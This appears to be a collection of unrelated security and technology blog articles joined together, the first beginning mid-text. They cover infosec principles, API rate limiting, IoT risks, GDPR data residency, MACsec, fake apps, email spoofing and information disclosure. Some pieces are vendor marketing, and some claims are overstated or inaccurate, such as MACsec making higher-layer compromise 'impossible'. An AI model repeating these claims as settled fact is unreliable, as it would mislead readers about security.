Much hardship arises when security professionals lose sight of this key concept. Security isn’t there because it’s cool. It’s there to help the organization do what it does. If that mission is making money, then the main mission of the security group — at its highest level — is to make that company money. To put it another way, the reason the security group is even there in the first place is to keep the organization from losing money. This isn’t a “leet” way to look at things for those who are into the novelty of being in infosec, but it’s a mentality that one needs to have to make it in the industry long-term. This is becoming increasingly the case as companies are starting to put a premium on the professionals who see security as a business function rather than a purely technical exercise.
Current IT infrastructure makes cracking trivial

While many of the most skilled attackers can (and have) come up with some ingenious ways to leverage vulnerabilities in systems, the ability to do what we see every day in the security world is fundamentally based on horribly flawed architecture. Memory management, programming languages, and overall security design — none of these things we use today were designed with security in mind. They were designed by academics for academics.

To use an analogy, I think we are building skyscrapers with balsa wood and guano. Crackers repeatedly tear into us at will and we can do nothing but patch and pray. Why? Because we’re trying to build hundreds of feet into the air using shoddy materials. Balsa wood and guano make excellent huts — huts that stand up to a casual rain storm and a bump or two. But they don’t do well against tornados, earthquakes, or especially hooligans with torches. For that we need steel. Today we don’t have any. Today we continue to build using the same old materials: the same memory management issues that allow buffer overflows to run rampant, the same programming language issues that make it easier to write dangerous code than safe code, etc. Until we have new materials to build on, we’ll always remain behind the curve. It’s just too easy to light wood on fire or smash a hole in it.

So, all analogies aside, I think within the next decade or so we’ll see the introduction of new system architecture models — models that are highly restrictive and run using a “default closed” paradigm. New programming languages, new IDEs, new compilers, new memory management techniques — all designed from the ground up to be secure and robust. The upshot is that within that time period I think we’ll see systems that can be exposed to the world and stand on their own for years with little chance of compromise. Successful attacks will still happen, of course, but they’ll be extremely rare compared to today. Security problems will never go away, we all know that, but they’ll return to being human/design/configuration issues rather than issues with gaping technological flaws.

Security by obscurity is bad, but security with obscurity isn’t

I’ve been in many debates online over the years about the concept of security by obscurity. Basically, there’s a popular belief out there that if any facet of your defense relies on secrecy, then it’s fundamentally flawed. That’s simply not the case. The confusion is based on the fact that people have heard security by obscurity is bad, and most don’t understand what the term actually means. As a result, they make the horrible assumption that relying on obscurity — even as an additional layer on top of already good security — is bad. This is unfortunate.

What security by obscurity actually describes is a system where secrecy is the only security. It comes from the cryptography world, where poor encryption systems are often implemented in such a way that the security of the system depends on the secrecy of the algorithm rather than that of the key. That’s bad — hence the reason security by obscurity is known as a no-no.

What many people don’t realize is that adding obscurity to security that’s already solid is not a bad thing. A decent example of this is the Portknocking project. This interesting tool allows one to “hide” daemons that are available on the Internet. The software watches firewall logs for specific connection sequences that come from trusted clients. When the tool sees the specific knock on the firewall, it opens the port. The key here is that it doesn’t just give you a shell — that would be security by obscurity. All it does at that point is give you a regular SSH prompt, as if the previous step wasn’t even involved. It’s an added layer, in other words, not the only layer.
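To make the idea concrete, here is a hypothetical sketch of the client side of a port knock: fire connection attempts at a secret sequence of closed ports, then connect normally to SSH. The host, port sequence, and timing below are made-up assumptions for illustration; real implementations such as the Portknocking project differ in detail, and the server-side daemon that watches the firewall logs is a separate piece entirely.

```python
# Hypothetical port-knock client sketch. The knock sequence is an
# assumption for illustration; the server side (watching firewall logs
# and opening the port) is a separate daemon, as described above.
import socket
import time

KNOCK_SEQUENCE = [7000, 8000, 9000]    # secret sequence (illustrative)
TARGET = "192.0.2.10"                  # hypothetical host
SSH_PORT = 22

def knock(host, ports, delay=0.3):
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(0.2)
            try:
                s.connect((host, port))   # will normally fail: port is closed
            except OSError:
                pass                      # the logged attempt *is* the signal
        time.sleep(delay)                 # give the daemon time to see each hit

knock(TARGET, KNOCK_SEQUENCE)
# After a correct knock the firewall opens port 22 for this client;
# authentication is still ordinary SSH -- obscurity added on top of
# security, not substituted for it.
ssh = socket.create_connection((TARGET, SSH_PORT), timeout=5)
print(ssh.recv(64))                       # SSH banner, e.g. b"SSH-2.0-..."
ssh.close()
```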
Security is a process rather than a destination

This is a pretty common one but it bears repeating. You never get there. There’s no such thing. It’s something you strive for and work towards. The sooner one learns that, the better.

Complexity is the enemy of security

You may call me a weirdo, but I think the entire concept of simplicity is a beautiful thing. This applies to web design, programming, life organization, and yes — security. It’s quite logical that complexity would hinder security, because one’s ability to defend a system rests heavily on their understanding of it. Complexity makes things more difficult to understand. Enough said.

My hope is that this short collection of ideas about information security will be of use to someone. If you have any questions or comments feel free to email me at firstname.lastname@example.org. I’m sure I’ve left out a ton of stuff that should have gone into this, and I’d appreciate any scolding along those lines.
API Rate Limiting is simply controlling how many requests or calls an API consumer can make to your API. You may have experienced something related as a consumer, with errors about “too many connections” or something similar when you are visiting a website or using an app.

What is an API consumer?

An API consumer could be a mobile app, a website, or even your doorbell or thermostat! Anything that makes a call to an API to get data is an API consumer. These calls are made via API requests.

What is an API request?

An API request (or call) is where one of these consumers, say your thermostat, requests information from “the cloud” (or servers on the internet). Say your thermostat wants to find out the current weather conditions so that it can display them for you. That would be an API request. The largest number of API requests, by far, come from mobile apps. A single mobile app might make 10-20 API requests just by you opening the app and logging in!

How are API Rate Limits typically set?

API Rate Limits are typically set up to limit the number of requests:

- per second
- per minute
- per hour
- per day (or 24-hour period)
- per month

An API is not limited to picking just one of these. You could have one API Rate Limit per second and a different API Rate Limit per hour; one or more API Rate Limits can be active at the same time. API Rate Limiting might even be implemented differently depending on whether you are authenticated or not. Authenticated API users (API consumers that have included their credentials in the API call) might be allowed more requests than anonymous users.

Do I need to implement API Rate Limiting?

Most likely, yes. But it’s important to understand the reasons why you might need it. If you are going to measure the success (or failure) of rate limits, you have to have a clear and defined purpose. Here are some reasons you might hear, but not every one of these problems is best solved by API Rate Limits!

Protect your APIs from Distributed Denial of Service (DDoS) attacks

While these attacks are a very real threat and can take down your API (which is a bad thing), API Rate Limiting is probably not the right solution for blocking them. There are other, more robust solutions for protecting your APIs from DDoS that should be looked at first.

Limit your backend expenses and costs

This can be a very legitimate reason for implementing API Rate Limiting. Let’s go back to the thermostat example. Say there is a line of thermostats that go bonkers and get stuck in a loop, calling your weather API over and over. While this might not take down your API, it could cost you a pretty penny, because you are the one that has to pay for all the backend servers and services that make that weather API work! By limiting the calls per consumer, you could protect your resources and money.

Work around hardware limitations

Getting a lot of API calls could mean that your backend servers can’t keep up. This could lead to bottlenecks and the equivalent of driving on the highway during rush hour traffic, slowing everyone down as requests queue up. Slow API calls could mean really slow web pages and really unhappy users.

What are my options for implementing API Rate Limits?

There are a few different ways of handling calls made over the limit (a combined sketch follows the list below):

- Hard Stop: An API consumer will get a 429 error when they call your API if they are over their limit.
- Soft Stop: In this case, you might have a grace period where calls can continue to be made for a short period after the limit is reached.
- Throttled Stop: You might just enforce a slowdown on calls made over the limit. This way users can continue to make calls, but they will be slower because they are over the limit.
- Billable Stop: Here you might charge the API consumer for calls made over their limit. Obviously, this would only work for authenticated API users, but it can be a valid solution.

💡 Bonus tips for API Rate Limits!

If you don’t want your API users to hate you, there are three things you need to do:

1️⃣ Don’t be greedy

As we talked about earlier, there are several reasons for implementing API Rate Limits. Getting too greedy with your limits, though, can keep users from being able to implement the solutions they need to help them win. You win when your users win, so don’t drive them to abandon your API for a competitor’s because you arbitrarily set your limits too low.

2️⃣ Be transparent and informative

Be transparent with users about how you implemented API Rate Limiting and what methods you chose for handling users who go over their limit. You really want to make sure that you are upfront with your users if you are going to charge them for overages. Clearly document everything and educate your users, not only about your API Rate Limiting policy but also about steps they can take to avoid hitting those limits.

3️⃣ Let API consumers know the status of their API limits in every call

There are a couple of different ways to implement this, but most APIs will add a header to the API response that tells the consumer how many calls they have left in the current period and when the counter will reset. This way API consumers can make informed decisions about when (and how many) API calls to make.
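Tying the “hard stop” option and tip 3 together, here is a minimal fixed-window rate limiter sketch in plain Python, independent of any web framework. The X-RateLimit-* header names follow a common convention rather than a formal standard, and the limits are illustrative assumptions.

```python
# Minimal fixed-window rate limiter: a hard stop (429) once the per-minute
# limit is hit, plus the informational headers described in tip 3.
# Framework-agnostic sketch; limits and header names are illustrative.
import time
from collections import defaultdict

LIMIT = 60      # requests allowed per window (illustrative)
WINDOW = 60     # window length in seconds

counters = defaultdict(lambda: [0, 0.0])   # consumer_id -> [count, window_start]

def check_rate_limit(consumer_id: str):
    now = time.time()
    count, start = counters[consumer_id]
    if now - start >= WINDOW:               # window expired: start a new one
        count, start = 0, now
    count += 1
    counters[consumer_id] = [count, start]
    headers = {
        "X-RateLimit-Limit": str(LIMIT),
        "X-RateLimit-Remaining": str(max(LIMIT - count, 0)),
        "X-RateLimit-Reset": str(int(start + WINDOW)),  # when the window resets
    }
    status = 200 if count <= LIMIT else 429  # hard stop over the limit
    return status, headers

status, headers = check_rate_limit("thermostat-42")
print(status, headers)
```

A soft stop, throttled stop, or billable stop would branch differently on the over-limit case (allow with a grace counter, sleep before responding, or record an overage charge), but the counting logic stays the same.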
By now, everyone has heard the numbers. IoT is part of a networking revolution that is transforming the world. Experts predict that by 2020 there will be over 33 billion IoT devices deployed, or 4.3 Internet-connected devices for every man, woman, and child on the planet.

Of course, IoT is more than just one thing. There are a variety of IoT devices and categories, each with their own implications. Consumer IoT includes the connected devices we are most familiar with, such as smart cars, phones, watches, laptops, connected appliances, and entertainment systems. Commercial IoT includes things like inventory controls, device trackers, and connected medical devices. Industrial IoT covers such things as connected electric meters, wastewater systems, flow gauges, pipeline monitors, manufacturing robots, and other types of connected industrial devices and systems.

The implications for networks, and especially security, are huge. Increasingly, IoT devices are being woven into local, national, and global networks, including critical infrastructures, creating hyperconnected environments of transportation, water, energy, communications, and emergency systems. Healthcare agencies, refineries, agriculture, manufacturing, government agencies, and even smart buildings and cities all use IoT devices to automatically track, monitor, coordinate, and respond to events. While automating decisions and processes at machine speeds can generate revenue, improve our quality of life, make us more productive, and even save lives, it also introduces new risks and widens the threat landscape.

1. Some of the data passing from, to, or between connected devices contains personal information that can be exploited, including locations, names and addresses, ordering and billing information, credit card and bank information, medical records, government-issued ID numbers, etc.

2. When compromised IoT devices are connected to IT networks, they can become a conduit for breaches or the injection of malware.

3. Compromised Industrial and Commercial IoT devices can be used to make changes on the manufacturing floor. Operations technology, SCADA, and industrial control systems actually control physical systems, not just the bits and bytes of traditional IT networks, and even the slightest tampering can sometimes have far-reaching - and potentially devastating - effects.

4. Increasingly, IoT is also being integrated into our critical infrastructure. Transportation systems, chemical refineries, wastewater systems, energy grids, culinary water, and communications systems all use IoT devices. The cascading effect of a serious compromise could be catastrophic.

The challenge is that many IoT devices were never designed with security in mind. IoT security challenges include weak authentication and authorization protocols, insecure software, firmware with hard-coded back doors, poorly designed connectivity and communications, and little to no configurability. And most IoT devices are “headless,” with limited power and processing capabilities. This not only means they can’t have security clients installed on them, but most can’t even be patched or updated.

The risk is real. Just last fall, compromised IoT devices were gathered into a massive botnet, causing the largest denial of service outage in history. Unfortunately, the general response by the security industry has been woefully inadequate.
Sure, the expo floor at this year's RSA conference is filled with vendors promoting devices and tools to soothe the IoT worries of organizations. The problem is that the network teams that need to test, deploy, manage, and monitor these devices are already overwhelmed. Dozens of isolated devices with separate management interfaces have placed a strain on limited IT resources. Large enterprises already need to manage an average of 30 security consoles, connected to hundreds of security devices that usually operate in isolation. This makes gathering threat intelligence a cumbersome and time-consuming task, often requiring the hand correlation of telemetry data in order to identify malware or compromised systems. And now, specialized security tools being created and promoted for IoT are going to expand the number of deployed hardware-based and virtual security devices even further.

The reality is that IoT cannot be treated and secured as an isolated, independent network. It interacts across your existing extended network, including endpoint devices, cloud, traditional and virtual IT, and OT. Isolated IoT security strategies simply increase overhead and reduce broad visibility. Instead, security teams need to be able to tie together and cross-correlate what is happening across their IT, OT, IoT, and cloud networks. Such an approach enables visibility across this entire ecosystem of networks, allowing the network to automatically collect and correlate threat intelligence and orchestrate real-time responses to detected threats.

This requires rethinking your security strategy. A distributed and integrated security architecture needs to cover your entire networked ecosystem, expand and ensure resilience, secure compute resources and workloads, and provide routing and WAN optimization. The Fortinet Security Fabric solves the challenge of security sprawl by integrating your security infrastructure into a single, holistic framework. This allows you to effectively monitor legitimate traffic, including IoT devices, check authentication and credentialing, and impose access management across your distributed environment through an integrated, synchronized, and automated security architecture managed through a single pane of glass.

In addition to our innovative Security Fabric solution, Fortinet is actively driving the development of IoT-specific security solutions. We already hold dozens of issued and pending IoT security patents that complement our industry-leading patent portfolio and have been woven seamlessly into our Security Fabric framework. Our commitment to innovation helps ensure that Fortinet continually delivers the most advanced security solutions designed to help organizations defend against the continually evolving threat landscape that threatens the success of their digital business and the emerging digital economy.
https://www.fortinet.com/blog/industry-trends/the-challenge-of-securing-iot
How the Social Internet of Things is Revolutionizing Connectivity

Humans are innovative, social beings, and that combination has driven technological advances that are changing the way we interact. The desire to connect has inspired a global technological network linking people, data, and things.

Traditionally, our conception of cloud- or Internet-based social solutions has existed in the digital world. We send emails, conduct video calls, or share social media posts. But our collective need to use resources efficiently and information effectively has led to innovations that also link objects to this network. The inclusion of sensors and actuators is turning everyday devices into smart objects. This interaction of smart objects with people through the Internet is called the Internet of Things, or IoT.

It is not enough to simply have objects connected: they need to achieve something or provide value with that connection. Objects like heart monitors and cars that were once distinctly separate are now connected to a network through the cloud. Doctors benefit by being able to regularly track patients' heart rates. Patients benefit from regular oversight and monitoring without frequent office visits. Cars connect to GPS and anti-theft systems, providing valuable information and protection for consumers. It is this real-time, automated transfer of accurate and actionable information, with little or no human intervention required, that makes the Internet of Things instant and effortless.

The Internet of People (IoP) takes the Internet of Things mobile with personal electronics. Mobile phones, fitness wrist bands, Google glasses, and any devices worn or embedded in textile products with sensors that communicate via the Internet through a human interface fall under this classification. The Internet of People already runs on billions of devices.

Both the Internet of Things and the Internet of People make big promises to benefit and enrich the lives of people. Despite claims that technology is making us more isolated and less communicative, we are actually at an exciting point for social networking and ubiquitous connectivity.

Connecting People with the World Around Them

We believe that technology and social connectivity should be seamless, which is why we provide instant and effortless access with technology that builds meaningful relationships: relationships with our friends, families, colleagues, customers, and suppliers, as well as with the environment around us.

In today's world, networking is essential for success and often happiness. We want to meet the right people; however, networking is not as easy as walking up to a person and saying "Hello." We have created a phone-to-phone technology that allows users to view social profiles of people nearby, so we can discern who matches our aims and goals. Whether we are looking for a business partner or searching for love, it is no longer a game of chance where we hope to stumble across somebody compatible. Our application facilitates connections so people never miss an opportunity to meet someone new.

We all want the advantages of technical convenience without giving up control over the information we share. As the concepts of the Internet of Things and the Internet of People evolve, so do the demands and wishes of the users. Ubiquitous computing brings with it intrusive privacy concerns. We will connect, but we will also retain our autonomy and privacy.
The Social Internet of Things connects objects and people into networks defined and managed by the user. Such networks create a technological interface between people and both the physical and virtual world. This helps them to find resources, obtain contextual information, and become visible. In a Social Internet of Things world, individuals define the parameters to take control of their privacy. Humans and things operate as equals and can request or provide information while maintaining their individuality.

Our app is an example of Social Internet of Things technology. It combines socially relevant technologies into a platform that not only offers people-to-people connections, but also seamlessly interacts with sensors in the environment. We carry our mobile phones with us every day, and your mobile phone can now give you more access to the experiences you want.

The possibilities of inter-connectivity are captivating. On an intimate level, its potential for elevating our personal interactions by improving the ways in which we interact with the everyday things that impact our lives is worthy of excitement.

Events like conferences and festivals are places where we socialize. We attend to experience or learn something new and to meet new people. Events are where we come together for personal or professional engagement. But now we can interact with the environment as well. The Social Internet of Things is redefining the event experience, and mobile innovation is enhancing it. Not only can attendees find and meet the right people with apps such as MeetVibe, but event organizers can offer additional advantages by incorporating physical beacons onsite as well.

People attending can receive welcome messages as they arrive, with links to event maps and schedules sent directly to their mobile phones. With beacons, you do not need to buy exhibition headphones to learn more about each item; instead, the information can be broadcast directly to attendees' mobile phones as they approach it. Festival organizers can also encourage attendees to explore less popular areas of a show by offering rewards or games that direct traffic. The opportunities for interaction and engagement are vast.

Today, presentations need to be more interactive than ever. But this communication requires an interface, and getting to that interface is often a slow process. Instead of posting a link on a screen for audience members to type into their mobile phones, the presenter can send everyone in the audience a link, making the process instant and effortless. No delays, no interruptions: a simple click and go. Presenters can also avoid being overwhelmed with administrative email requests for presentation slides after the show by automatically delivering a link to slide decks, websites, contact information, or e-books.

Beaconing technology enables this type of instant communication, while Social Internet of Things technology allows people to control if and when they choose to interact. Mobile social networking platforms create an environment for this social interaction. Each event organizer does not need to create their own mobile app, and attendees do not need to download an app for each event. Instead, attendees simply join events and start networking. Event organizers are engaging and building meaningful relationships with their attendees by including Social Internet of Things technology.
The brilliance is in its consideration of all the factors that affect inter-connectivity – humans, objects, and information alike. The Social Internet of Things is technology that enhances social connectivity, enabling a new way of engaging one another and building meaningful relationships with the world around us. Our app provides instant access to discovery, connectivity, and scheduling.
https://www.iiot-world.com/industrial-iot/digital-disruption/how-the-social-internet-of-things-is-revolutionizing-connectivity/
It pays to know where your data lives. And for some industries and countries, it's mandatory. So, the question is: what is data residency, and why should you and I care about it? Get the scoop on how GDPR and other regulations underscore the value of keeping your data close to home, and the related benefits that go beyond compliance. Data residency has become one of the big (but important!) things businesses have to think about, so let's go Ask Dux! In today's episode:

What is data residency?

Think about your stuff in the office. You know where your things are. You know where your computer is, your desk chair, your coworkers. But what about the actual data that you work with on a daily basis? You might not know where that goes in the cloud, and it is certainly tied to the geographic location where it is stored. When we talk about data residency, we're talking about the storage of personal information within a particular region where the data is processed, in accordance with the laws of that geographic destination.

Why is it important?

In the past, prior to the cloud, organizations pretty much kept and took care of their own data, especially back in the days of on-premises systems. Providers and organizations themselves are responsible for the personal information they hold. But today, with the cloud, in some cases we don't know where the data is physically stored. And so there are a lot of concerns - especially from government organizations - about how it's being used, and that this data may not be well protected.

There are general cybersecurity concerns, especially about government requests. There are situations where governments want to make sure that data sitting in their geographies is well protected. Some governments even mandate data residency requirements as an extra layer of security, especially if you're a government organization. Hence, it's no surprise that providers like Microsoft, Amazon, and Google have local data centers - and not just local data centers, but in some cases data centers specific to a particular government.

General Data Protection Regulation (GDPR): The gold standard of data regulation

GDPR is a data compliance standard that was established in Europe. It was one of the first sweeping standards around protecting personal information. There are a lot of guidelines and rules around it, but essentially, what it says is: any organization that has access to or is keeping personal data of any European citizen should protect it to a certain standard. If that information is breached or something happens to it, the organization or government entity holding it will be held liable and responsible. The regulation lays out guidelines on how organizations are supposed to protect the personal information of Europeans. That's the general idea around it.

There are also other considerations. For example, one common thing we now see a lot is the 'right to be forgotten'. Let's say you are a European citizen working for an organization and you leave your employer. You can actually ask your employer to get rid of any personal information they hold about you - not just your record, but emails, chats, and documents too. Shortly after GDPR, a lot of other compliance regulations came up, like the CCPA (California Consumer Privacy Act), and we are seeing similar guidelines emerging elsewhere, such as in South America.
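To make the 'right to be forgotten' concrete, here is a minimal, hypothetical Python sketch of servicing an erasure request across several data stores. The store names and records are purely illustrative, not a real AvePoint API; a real system would also have to cover mail, chat, and document platforms, as described above:

```python
# Hypothetical sketch of a GDPR "right to be forgotten" request
# handled across simple in-memory stores (illustrative names/records).
stores = {
    "hr_records": [{"user": "alice", "address": "1 Main St"},
                   {"user": "bob", "address": "2 High St"}],
    "chat_logs":  [{"user": "alice", "msg": "hi"}],
}

def erase_subject(user: str) -> dict:
    """Delete every record tied to one data subject and return a
    per-store count to keep as an audit trail for regulators."""
    audit = {}
    for name, records in stores.items():
        before = len(records)
        records[:] = [r for r in records if r["user"] != user]
        audit[name] = before - len(records)
    return audit

print(erase_subject("alice"))  # {'hr_records': 1, 'chat_logs': 1}
```

The audit trail matters as much as the deletion itself: if you get audited, you need evidence that the erasure actually ran.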
How should you comply?

GDPR is very strict, and enforcement is very strong. We've already seen a lot of companies fined up to 20 million euros - roughly 20 million US dollars, depending on the exchange rate. Organizations that need to comply must not only put all these policies in place but also make sure the policies are being enacted, and they need technology for that. At AvePoint, we have technologies and capabilities to help these organizations comply with GDPR and make sure that data is protected. And if you get audited, you can prove that you're complying with GDPR.

Complying with data regulations the right way

It begins with data mapping: understanding what data you have and where it's located. Especially now, when many organizations are global, you may have colleagues and employees in different parts of the world. If your data is spread out like that, you need to analyze which laws and regulations apply to you and what the associated risks are. Basically, you need to proactively control your data location, calculate risks, and take the actions required to minimize unwanted data exposure and inappropriate access.

Long story short: be proactive about it, know what the policies and guidelines are, and as much as you can, enable technology to support those guidelines and make sure you comply with them.

Join us on your GDPR journey: GDPR | EU General Data Protection Regulation | AvePoint

GDPR Compliance: Why Multi-Geo Tenancy Matters (Case Study) (avepoint.com)

Check out Forrester's New Wave SaaS Application Data Protection Q4 2021 report, where only AvePoint received the highest possible score for the multi-cloud SaaS backup criteria. Get free access to the report at avepoint.com/report.

Don't forget to send us your questions on Twitter with the hashtag #AskDux or send us an email at email@example.com. Subscribe where you get your podcasts! Search for "#ShiftHappens" in your favorite podcast app.
https://www.avepoint.com/blog/shifthappens/data-residency?amp
Understanding MACSec Encryption

Security breaches can occur at any layer of the OSI model. At Layer 2, common breaches include MAC address spoofing, ARP spoofing, denial-of-service (DoS) attacks against a DHCP server, and VLAN hopping. MACSec secures data on the physical media, making it impossible for the data to be compromised at higher layers. As a result, MACSec encryption takes priority over encryption methods that operate at higher layers, such as IPsec and SSL. MACSec is configured on the Customer Edge (CE) router interfaces that connect to Provider Edge (PE) routers, and on all of the provider router interfaces.
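As a hedged illustration only, a point-to-point, pre-shared-key MACsec setup on an IOS XR-style CE interface can look roughly like the sketch below. The key-chain name, key ID, placeholder key string, and interface are invented for this example, and the exact commands vary by platform and software release:

```
key chain MACSEC-KC macsec          ! illustrative key-chain name
 key 1000
  key-string <64-hex-char-psk> cryptographic-algorithm aes-256-cmac

interface HundredGigE0/0/0/1        ! CE interface facing the PE
 macsec psk-keychain MACSEC-KC
```

A matching key chain would have to be configured on the peer interface at the other end of the link for the MACsec Key Agreement (MKA) session to come up.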
https://www.cisco.com/c/en/us/td/docs/iosxr/ncs5500/security/71x/b-system-security-cg-ncs5500-71x/b-system-security-cg-ncs5500-71x_chapter_0101.html
It seems some malicious app developers have taken the phrase "fake it 'til you make it" to heart, as fake apps have become a rampant problem for Android and iPhone users alike. Even legitimate sources, such as Google Play and Apple's App Store, have been infiltrated with illegitimate applications, despite their own due diligence in combating this phenomenon.

After you download a fake app, cybercriminals can run ransomware or ad-delivered malware in the background of your device, making it difficult to notice that something is off. While you're minding your own business, your personal data - such as usernames, photos, passwords, and credit card information - can be compromised.

Malicious apps have become more challenging to detect, and even more difficult to delete from a device without causing further damage. The trend of fake apps shows no sign of slowing down either, as bad actors have become more brazen with the apps they work to imitate. From Nordstrom to Fortnite to WhatsApp, it seems no business or industry is off limits.

Luckily, cybercriminals have yet to figure out a sure-fire way to get their fake apps onto our devices. By paying extra attention to detail, you can learn to identify a fake app before downloading it. Here's how:

- Check for typos and poor grammar. Double-check the app developer name, product title, and description for typos and grammatical errors. Malicious developers often spoof real developer IDs, even by just a single letter, to seem legitimate. If there are promises of discounts, or the description just feels off, take those signals as red flags.
- Look at the download statistics. If you're attempting to download a popular app like WhatsApp, but it has an inexplicably low number of downloads, that's a fairly good indicator that the app is fraudulent.
- Read what others are saying. When it comes to fake apps, user reviews are your ally. Breezing through a few can provide vital information about whether an app is authentic, so don't be afraid to crowdsource those insights when you can.

If you do find yourself having accidentally downloaded a fake app, there are steps you can take to rid your phone of it. Here's what to do:

- Delete the app immediately, or as soon as you notice anything suspicious. If you can't find it but you're still having issues, the app could still be on your device. In the interest of self-preservation, fake apps can try to protect themselves from disposal by making their icon and title disappear. If that happens, go to your installed apps page(s) and look for blank spaces, as it may be hiding there.
- Check the permissions. After installation, check the app's permissions. Fake apps usually make long lists of frivolous requests in an effort to get access to more data.
- Clear the app's cache and data. If you do find the app you want to delete, this is the first step you must take to get it completely off your phone.
- Take the device to your provider. If you're still having issues after you've deleted an app, consider taking your device to your provider to run a diagnostic test.
- Factory reset. As a last resort, if you can't find the app because it has "disappeared," or traces of the app and malware linger, the best way to ensure it is completely gone is to wipe the data, factory reset your device, and start over. This is why it is vital to keep backups of your devices.
Even as malicious developers continue to spoof legitimate applications to gain access to victims' personal information, we can deter their advances simply by paying closer attention to detail. Stay vigilant and know the signs, so you can avoid fake apps at all costs. Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats.
https://www.mcafee.com/blogs/consumer/mobile-and-iot-security/fake-apps-taking-over-phone/
Email Phishing background

Email phishing frauds have been on the rise since the early '90s. A group of hackers that called themselves the warez community carried out the first email phishing attack. The group created an algorithm that allowed them to generate random credit card numbers, which they used to open AOL accounts. Those accounts were then used to spam others in AOL's community.

Related: 9 Popular Phishing scams

The internet has not only helped connect people all over the world but has also left businesses and organizations open to attacks. According to Symantec's 2018 Internet Security Threats Report, spear-phishing emails emerged as by far the most widely used infection vector, employed by 71 percent of groups.

A case of Human Error while handling email phishing

Given the nature of the email ecosystem, no matter how secure the email platform is, the weakest link is the human. Organisations regularly remind users to beware of phishing attacks, but many users don't really know how to recognize them. According to a Verizon cybersecurity report, an attacker sending out 10 phishing emails has a 90 percent chance that one person will fall for it.

- If your domain is acmecorp.com and your customer receives a mail from acmecarp.com (o changed to a), the customer may not notice the difference and may act on the contents of the email.
- A malicious user can send a mail to your customer from another mail server, masquerading as your domain acmecorp.com. If the receiving mail server is a good-quality mail server, such a mail will be marked as spam, since the receiving server will inspect the DNS records of acmecorp.com, check the SPF, DMARC, and DKIM records, and figure out that this particular mail never originated from an authorized acmecorp.com mail server. However, if the receiving server is a low-quality mail server, it will deliver the email to the user, and it is then up to the user to recognize the fraud.
- A user received a mail from his chairman with some instructions. The user responded with the required information before realizing that the mail was actually not from the chairman. While the name of the sender was the same as the chairman's name, the email ID was a public email ID. So, technically, it was a legitimate email from a valid email ID. The display name can be set to anything, and most email clients simply show the display name when you read the email, so it may be misleading.

In all these cases, your email ID has technically been spoofed without even using your email platform. The consequences of your customer's actions are the responsibility of neither you nor your email platform.

How does Mithi SkyConnect control email Phishing and Email Fraud?

Our solution is enabled with and protected by strong controls to ensure that emails sent and received from our system cannot be intercepted and modified. Some of the controls we deploy:

- All traffic to and from our service is encrypted, which prevents eavesdropping or tampering.
- All access to the service is via authentication, which is governed by strong password policies.
- Mithi SkyConnect runs ATP (advanced threat protection) and uses sandboxing to filter malware.
- While sending emails from our service, the system checks for spoofed email to ensure that the sender's email ID, the sender's password, and the sender's claim as sender are all in sync. This means that only I can send a mail from my ID.
- We recommend and work with you to deploy DKIM, DMARC, and SPF records in your DNS, to help receivers confirm that mail coming from your email domain was actually sent by authorized mail servers (illustrated below).
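As a rough illustration of the DNS checks a good receiving server performs, the Python sketch below (using the dnspython package) looks up a domain's SPF and DMARC TXT records. The domain is the placeholder from the examples above, and real validators do considerably more than this:

```python
# Sketch: fetch the SPF and DMARC TXT records a receiving mail server
# consults before trusting a sender domain. Requires dnspython.
import dns.resolver

def txt_records(name: str) -> list[str]:
    try:
        return [r.to_text().strip('"') for r in dns.resolver.resolve(name, "TXT")]
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
        return []

domain = "acmecorp.com"  # placeholder domain from the examples above
spf = [t for t in txt_records(domain) if t.startswith("v=spf1")]
dmarc = [t for t in txt_records("_dmarc." + domain) if t.startswith("v=DMARC1")]
print("SPF:", spf or "not published")
print("DMARC:", dmarc or "not published")
```

A low-quality receiving server that skips checks like these is exactly the gap the spoofing examples above exploit.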
For a full list of security controls, please read this.

Our Recommendation: Introducing processes to minimize instances of Email Phishing

To help secure our customers' email flow, we recommend a combination of people, processes, and technology. We suggest the following policies be deployed, in addition to the tight security controls provided by SkyConnect:

- When making financial transactions, customers and vendors should be sensitized to verify the information they receive by an alternate method, such as a phone call. Alternatively, we strongly suggest not using email for such requests at all, and instead using an authenticated application portal, similar to a ticketing system, where requests for payment and the like can be entered.
- If you must send sensitive information over email, then encrypt and digitally sign the email to secure the communication, and limit it to only the two or three people who are privy to the conversation. This can be done from Baya3, Thunderbird, or Outlook by using the sign-email feature.
- Put a filter on the inbound mail scanner to insert an alert message into mail coming from external domains.
- Build awareness among the user community to be more vigilant before responding to external email asking for personal, financial, or other classified information. This should be done on an ongoing basis using classrooms, videos, FAQs, and email alerts.

Report abusive mail on the sending platform, so it can take appropriate action. We propose that you also report it to the local cyber-crime unit of your region. These units can authoritatively ask the public email solution provider or the sender's IT team for information to locate the user via the IP address.

Strong security controls and a strong complementary process can minimise instances of email phishing and email fraud in your business.
https://skyconnect.mithi.com/blogs/email-phishing-humans-are-the-weakest-link/
Information Disclosure, also known as Information Leakage, is when a website unintentionally reveals sensitive information. Depending on the context, websites may leak all kinds of information to a potential attacker, including:

- Data about other users, such as a valid username revealed via failed-login messages, or personal information that should not be provided to anyone except its owner
- Sensitive commercial or business data
- Technical details about the website and its infrastructure

Leaking sensitive user or business data can compromise the business or the confidentiality of personal information. However, disclosing technical information can be severe as well. Although some of this information will be of limited use, it can be a starting point for exposing additional attack surfaces that contain other vulnerabilities to exploit. For example, disclosing the applications and versions running on a website may reveal the appropriate exploits to run against unpatched applications.

Sensitive information may be unintentionally leaked to users who are simply browsing the website in a normal fashion. More commonly, an attacker causes information disclosure by interacting with the website in unexpected or malicious ways, and then carefully studies the website's responses to try to identify interesting behavior. Some examples of information disclosure are found below:

- Revealing the names of hidden directories, their structure, and their contents via a robots.txt file or directory listing
- Providing access to source code files via temporary backups that are not properly protected
- Explicitly mentioning database table or column names in error messages
- Unnecessarily exposing highly sensitive information, such as credit card details
- Hard-coding API keys, IP addresses, database credentials, and so on in the source code (see the sketch at the end of this piece)
- Hinting at the existence or absence of resources, usernames, and so on via subtle differences in application behavior

How Does My SMB or MSP Prevent This?

One of the primary prevention methods revolves around developers and those who work administratively within the company website. The recommendations below are strictly for administrators or developers of your website or application:

Additional Cybersecurity Recommendations

In addition to the above recommendations, the items below will help you and your business stay secure against many of the threats you may face on a day-to-day basis. All of the suggestions listed below can be gained by hiring CyberHoot's vCISO services.

- Govern employees with policies and procedures. You need a password policy, an acceptable use policy, an information handling policy, and a written information security program (WISP) at a minimum.
